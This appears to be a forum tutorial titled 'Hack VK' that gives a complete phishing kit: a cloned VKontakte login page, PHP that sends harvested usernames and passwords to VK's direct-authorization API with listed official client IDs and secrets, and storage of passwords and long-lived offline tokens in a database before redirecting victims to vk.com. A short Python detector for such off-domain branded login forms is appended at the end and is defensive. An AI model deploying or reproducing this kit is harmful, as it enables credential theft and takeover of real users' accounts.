Hack VK

Lord777

The essence of the mechanism is that we will send data from HTML forms to VK servers. In response, we will receive an access token.
We will do this using cURL and direct authorization through the VK API. We will perform authorization as an official application. A direct authorization request looks something like this:

Code:
https://api.vk.com/oauth/token?grant_type=password&client_id= [our value] & scope = [our value] & client_secret = [our value] & username = [our value] & password = [our value]

What does all of this mean:
  • client_id is the id of our application. Let's write the value 2274003 to the client_id.
  • scope - the access rights required by the application. We will not complicate our life, but simply request an offline token by writing the value "offline" to the scope. This will be enough to enter the VK page by token through apidog.ru. Important: such a token "lives" until the user changes the password, or ends all sessions in the security settings.
  • client_secret - your application's secret key. Will be equal to hHbZxrka2uZ6jB1inYsH
  • username - VK username
  • password - the password of the VKontakte user
Options for official client_id and client_secret

Android:
client_id: 2274003
client_secret: hHbZxrka2uZ6jB1inYsH

IPhone:
client_id: 3140623
client_secret: VeWdmVclDCtn6ihuP1nt

IPad:
client_id: 3682744
client_secret: mY6CDUswIVdJLCD3j15n

Windows desktop:
client_id: 3697615
client_secret: AlVXZFMUqyrnABp8ncuU

Windows phone:
client_id: 3502557
client_secret: PEObAuQi6KloPM4T30DV

Now you need an authorization form as in VK.
Create a php document authorize.php
authorize.php:
Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  <head>
  <?php
  $errorGet = $_GET['error_login'];
    if (!$errorGet)
    {
        echo "<style>
        #hide_row_pass {display: none;}
        </style>";
    }
else
    {
        echo "<style>
        #hide_row_pass {display: block;}
        </style>";
    }
  ?>
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <title> ВКонтакте | Login </title>
    <link rel="stylesheet" type="text/css" href="css/al/common.css?34795707965" /><link rel="stylesheet" type="text/css" href="css/al/fonts_cnt.css?5181750877" />
    <link type="text/css" rel="stylesheet" href="css/api/oauth_popup.css?29651175773"></link>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <link rel="shortcut icon" href="images/icons/favicons/fav_logo_2x.ico?8"></link>
  </head>

  <body class="VK oauth_centered">
    <script>
      if (window.devicePixelRatio >= 2) document.body.className += ' is_2x';
    </script>
    <div class="oauth_wrap">
      <div class="oauth_wrap_inner">
        <div class="oauth_wrap_content" id="oauth_wrap_content">
          <div class="oauth_head">
  <a class="oauth_logo fl_l" href="https://vk.com" target="_blank"></a>
  <div id="oauth_head_info" class="oauth_head_info fl_r">
    <a class="oauth_reg_link" href="https://vk.com/join?reg=1" target="_blank">Регистрация</a>
  </div>
</div>

<div class="oauth_content box_body clear_fix">
  <div class = "box_msg_gray box_msg_padded"> To continue, you need to log in <b> VK </b>. </div>

  <form method="POST" id="login_submit" action="login.php">
    <div class="oauth_form">
 
    <div id = "hide_row_pass" class = "box_error"> Invalid username or password specified. </div>
      <div class="oauth_form_login">
        <div class="oauth_form_header">Телефон или email</div>
        <input type="text" class="oauth_form_input dark" name="login" value="">
        <div class="oauth_form_header">Пароль</div>
        <input type="password" class="oauth_form_input dark" name="password" />
 
        <button class="flat_button oauth_button button_wide" id="install_allow" type="submit" name="submit_login">Войти</button>
        <a class="oauth_forgot" href="https://vk.com/restore" target="_blank">Забыли пароль?</a>
      </div>
    </div>
  </form>
</div>
        </div>
      </div>
    </div>
  </body>
</html>



Now we need a file that will send the login and password for authorization and receiving a token. Let's call login.php
But before that, we will create a database where we will write all valid data.

1. Go to hosting in PhpMyAdmin and click "Create"


2. Let's create a table with 7 columns


3. The parameters id, Login (login), Password (password), Token (token), Date (date), Name (first_name) and Surname (last_name) will be set as in the picture

The id column parameters must be set to A_I (auto_increment) and PRIMARY KEY.


Now the login.php file itself:
Code:
<?php
// Create headers
$headers = array(
'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'content-type' => 'application/x-www-form-urlencoded',
'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'
);
// Write here the login and password values from the HTML form
$login = $_POST['login'];
$password = $_POST['password'];
// If some field is empty
if (empty($login) or empty($password))
{
// Send the user to the authorize start page and signal an error
    header('Location: /authorize.php?error_login=true');
    exit;
}
    else
{
// If all fields are filled in, then send a request to receive a token using our link above
    $get_token = post ('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.'' ,array(
    'headers' => array(
    'accept: '.$headers['accept'],
    'content-type: '.$headers['content-type'],
    'user-agent: '.$headers['user-agent']
    )
    ));
// If authorization was successful
if (preg_match("/[a-z0-9]{85}/", $get_token['headers'], $token))
{
    $token1 = json_decode(file_get_contents('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.''), true);
   $data = json_decode(file_get_contents('https://api.vk.com/method/users.get?user_id='.$token1['user_id'].'&access_token='.$token[0].'&fields=uid,first_name,last_name&v=5.80'), true);

   // Write the current date and time of the server to the variable
$date_l = date("H:i:s  d-m-Y");
// Connect to the database
    $host="localhost";
    $ user = ""; // Username from MySql
    $ pass = ""; // MySql password
    $ db_name = ""; // Base name
    $link=mysql_connect($host,$user,$pass);
    mysql_select_db($db_name,$link);
    mysql_query("set names utf8");
// Write valid to the database
    $sql = mysql_query("REPLACE INTO vk(login, password, token, date, user_id, first_name, last_name) VALUES('".$login."','".$password."','".$token[0]."','".$date_l."','".$token1['user_id']."','".$data['response'][0]['first_name']."','".$data['response'][0]['last_name']."')");
// If everything went well, then redirect the user to vk.com or to your site
    if ($sql) {
        session_start();
        $_SESSION['logged_user'] = $data['response'][0]['first_name'];
        header('Location: vk.com/');
// If errors are found during the recording, then we will redirect the user to the main page of our site with an error message
    } else header('Location: /authorize.php?error_login=true');
// Close the connection
mysql_close($link);
exit;
}
// If authorization failed, then send the user to the start page with an error
else header('Location: /authorize.php?error_login=true');
}
//cUrl POST
function post($url = null, $params = null, $proxy = null, $proxy_userpwd = null) {
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

if(isset($params['params'])) {
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, $params['params']);
}

if(isset($params['headers'])) {
  curl_setopt($ch, CURLOPT_HTTPHEADER, $params['headers']);
}

if(isset($params['cookies'])) {
  curl_setopt($ch, CURLOPT_COOKIE, $params['cookies']);
}

if($proxy) {
  curl_setopt($ch, CURLOPT_PROXY, $proxy);

  if($proxy_userpwd) {
   curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy_userpwd);
  }
}

$result = curl_exec($ch);
$result_explode = explode("\r\n\r\n", $result);

$headers = ((isset($result_explode[0])) ? $result_explode[0]."\r\n" : '').''.((isset($result_explode[1])) ? $result_explode[1] : '');
$content = $result_explode[count($result_explode) - 1];

preg_match_all('|Set-Cookie: (.*);|U', $headers, $parse_cookies);

$cookies = implode(';', $parse_cookies[1]);

curl_close($ch);

return array('headers' => $headers, 'cookies' => $cookies, 'content' => $content);
}
?>

Into variables $ host = "localhost";

$ user = ""; // Username from MySql

$ pass = ""; // MySql password

$ db_name = ""; // Base name

We enter our data.
On line 50, if the authorization was successful, you need to redirect the user to your site or wherever you want.
header ('Location: "Your site"');
It remains to upload all the files to the hosting and you can fish.
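Detection side of the page described above, as an added example that is not part of the original post: a triage check for a fetched page that flags a VK-branded form containing a password field whose action resolves to a host outside vk.com. The brand domain, the marker strings, the sample HTML and the `login-example.invalid` host are assumptions constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumptions for this example: the brand's domain and the strings treated as brand markers.
BRAND_DOMAIN = "vk.com"
BRAND_MARKERS = ("вконтакте", "vk.com", "oauth_popup.css")
# Constructed sample, reduced from the form structure shown in the post.
SAMPLE = """<html><head><title>ВКонтакте | Login</title>
<link rel="stylesheet" href="css/api/oauth_popup.css"></head><body>
<form method="POST" action="login.php"><input type="text" name="login">
<input type="password" name="password" /></form></body></html>"""

class LoginFormScan(HTMLParser):
    """Records every <form> action, whether it holds a password input, and brand markers."""
    def __init__(self):
        super().__init__()
        self.forms = []       # [action, has_password_input] for each <form>
        self.markers = set()  # brand strings seen in attribute values or text

    def _note(self, text):
        self.markers.update(m for m in BRAND_MARKERS if m in text.lower())

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append([a.get("action") or "", False])
        elif tag == "input" and (a.get("type") or "").lower() == "password" and self.forms:
            self.forms[-1][1] = True
        for value in a.values():
            self._note(value or "")

    def handle_data(self, data):
        self._note(data)

def is_brand_host(host):
    """True only for the brand domain or its subdomains, not look-alike prefixes."""
    host = (host or "").lower()
    return host == BRAND_DOMAIN or host.endswith("." + BRAND_DOMAIN)

def triage(page_url, html):
    """Return one finding per branded credential form whose action resolves off-brand."""
    scan = LoginFormScan()
    scan.feed(html)
    findings = []
    for action, has_password in scan.forms:
        target = urlparse(urljoin(page_url, action)).hostname
        if has_password and scan.markers and not is_brand_host(target):
            findings.append({"posts_to": target, "markers": sorted(scan.markers)})
    return findings
```

Calling `triage(url, html)` on a crawled or user-reported page returns an empty list when the form posts back to vk.com or when no password field is present.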
 